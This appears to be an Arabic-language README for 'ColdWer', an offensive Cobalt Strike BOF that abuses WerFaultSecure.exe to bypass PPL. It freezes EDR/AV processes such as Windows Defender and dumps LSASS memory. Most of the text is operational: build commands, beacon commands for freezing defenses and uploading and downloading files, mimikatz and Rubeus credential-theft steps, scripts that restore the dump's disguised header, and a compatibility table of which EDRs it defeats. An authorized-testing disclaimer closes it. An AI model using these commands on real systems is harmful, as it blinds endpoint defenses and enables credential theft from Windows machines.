
Cobalt Strike BOF لتجميد عمليات EDR/AV وتفريغ LSASS باستخدام تجاوز PPL عبر WerFaultSecure.exe
حرب باردة على نقطة النهاية الخاصة بك.
ColdWer يستخدم ثغرة تجاوز PPL لـ WerFaultSecure.exe لتجميد عمليات EDR/AV وتفريغ ذاكرة LSASS على أنظمة Windows الحديثة.
C O L D W E R
└─┴─┴── WerFaultSecure
└─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)
جمّد EDR/AV الخاص بك. استخرج ما تحتاج. ابقَ بارداً.
Sh3llf1r3 (@0xsh3llf1r3)
يعتمد هذا المشروع على أبحاث TwoSevenOneT (@TwoSevenOneT):
| المشروع | الوصف |
|---|---|
| EDR-Freeze | تقنية تجميد EDR الأصلية |
| WSASS | تفريغ LSASS عبر WerFaultSecure |
كل الفضل للتقنيات الأساسية يعود إلى TwoSevenOneT.
git clone https://github.com/0xsh3llf1r3/ColdWer.git
cw/coldwer.cna# انتقل إلى دليل المصدر
cd src/
# ترجمة BOF (يتطلب MinGW)
make
# أو يدويًا:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o
coldwer.o و coldwer.cnacoldwer.cna في Cobalt Strike# ابحث عن PID لـ Windows Defender
beacon> ps
# جمّد العملية
beacon> cw-freeze 1337
# نفّذ أوامرك أثناء تجميد EDR/AV
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage
# فك التجميد عند الانتهاء
beacon> cw-unfreeze
# الخطوة 1: رفع WerFaultSecure.exe من Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe
# الخطوة 2: ابحث عن PID لـ LSASS
beacon> ps
# الخطوة 3: تفريغ LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# الخطوة 4: تنزيل التفريغ
beacon> download C:\Windows\Temp\lsass.dmp
غيّر رأس الملف لاستعادة تنسيق minidump:
| الأصلي (PNG) | غيّره إلى (MDMP) |
|---|---|
89 50 4E 47 | 4D 44 4D 50 |
أوامر استعادة الرأس:
| الطريقة | الأمر |
|---|---|
| Python | open('lsass.dmp','r+b').write(b'MDMP') |
| Bash | printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc |
| PowerShell | $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close() |
ثم حلّل باستخدام Mimikatz:
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
| الأمر | الوصف |
|---|---|
cw-freeze <PID> [Path] | تجميد عملية |
cw-unfreeze | فك تجميد العملية المجمدة سابقًا |
cw-dump <PID> <Path> | تفريغ ذاكرة LSASS |
# تجميد باستخدام المسار الافتراضي
beacon> cw-freeze 1337
# استخدام WerFaultSecure.exe مخصص
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe
# تفريغ LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# فك التجميد عند الانتهاء
beacon> cw-unfreeze
| الهدف | الحالة |
|---|---|
| Windows Defender (MsMpEng.exe) | ✅ يعمل |
| LSASS (lsass.exe) | ✅ يعمل |
| عمليات PPL الأخرى | ✅ يعمل |
لا يعمل ضد EDRs التي تمتلك حماية ذاتية في وضع kernel:
| EDR | الحالة |
|---|---|
| Elastic Endpoint | ❌ محظور |
| CrowdStrike Falcon | ❌ محظور |
| SentinelOne | ❌ محظور |
| Carbon Black | ❌ محظور |
1. 🚀 تشغيل WerFaultSecure.exe كـ PPL (مستوى WinTcb)
↓
2. 🎯 WerFaultSecure يلتصق بالعملية المستهدفة
↓
3. ⏸️ MiniDumpWriteDump يعلق جميع خيوط العملية المستهدفة
↓
4. 🥶 تعليق WerFaultSecure نفسه → تبقى العملية الهدف مجمدة
↓
5. ✅ تنفيذ أوامرك (EDR/AV لا تستطيع الرؤية!)
↓
6. 🔥 إنهاء WerFaultSecure → تفك تجميد العملية الهدف
| الإصدار | المخرجات |
|---|---|
| Windows 10/11 | تفريغ مشفر فقط |
| Windows 8.1 | تفريغ خام غير مشفر |
⚠️ لاختبارات الأمن المصرح بها فقط
هذه الأداة مخصصة لـ:
- اختبار الاختراق المأذون به
- عمليات الفريق الأحمر بإذن كتابي
- أبحاث الأمن في بيئات خاضعة للرقابة
المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
رخصة MIT - انظر LICENSE
🥶 ابقَ بارداً. ابقَ هادئاً. 🥶
⭐ قم بتنجيم هذا المستودع إذا وجدته مفيدًا! ⭐
| الميزة | الوصف |
|---|
| ❄️ تجميد | وضع عمليات EDR/AV في حالة غيبوبة |
| 🔓 تفريغ | استخراج ذاكرة LSASS متجاوزًا PPL |
| 🛡️ تجاوز PPL | الاستفادة من WerFaultSecure.exe على مستوى WinTcb |
| ⚡ سريع | تنفيذ BOF مباشر |
| 🎯 تحكم يدوي | أنت من يقرر متى تجمد وتفك التجميد |
| الخطأ | السبب | الحل |
|---|
| الملف غير موجود | مسار غير صحيح | تحقق من مسار WerFaultSecure.exe |
| تم رفض الوصول | صلاحيات منخفضة | تشغيل كـ Administrator/SYSTEM |
| توقيع غير صالح | ملف ثنائي غير موقع | استخدم WerFaultSecure.exe موقعًا بشكل صحيح |
| العملية غير موجودة | PID خاطئ | تحقق من PID باستخدام الأمر ps |
| الهدف محمي | حماية kernel | EDR لديه حماية ذاتية (لا يمكن تجاوزها) |
| مجمد بالفعل | حالة عالقة | قم بتشغيل cw-unfreeze أولاً |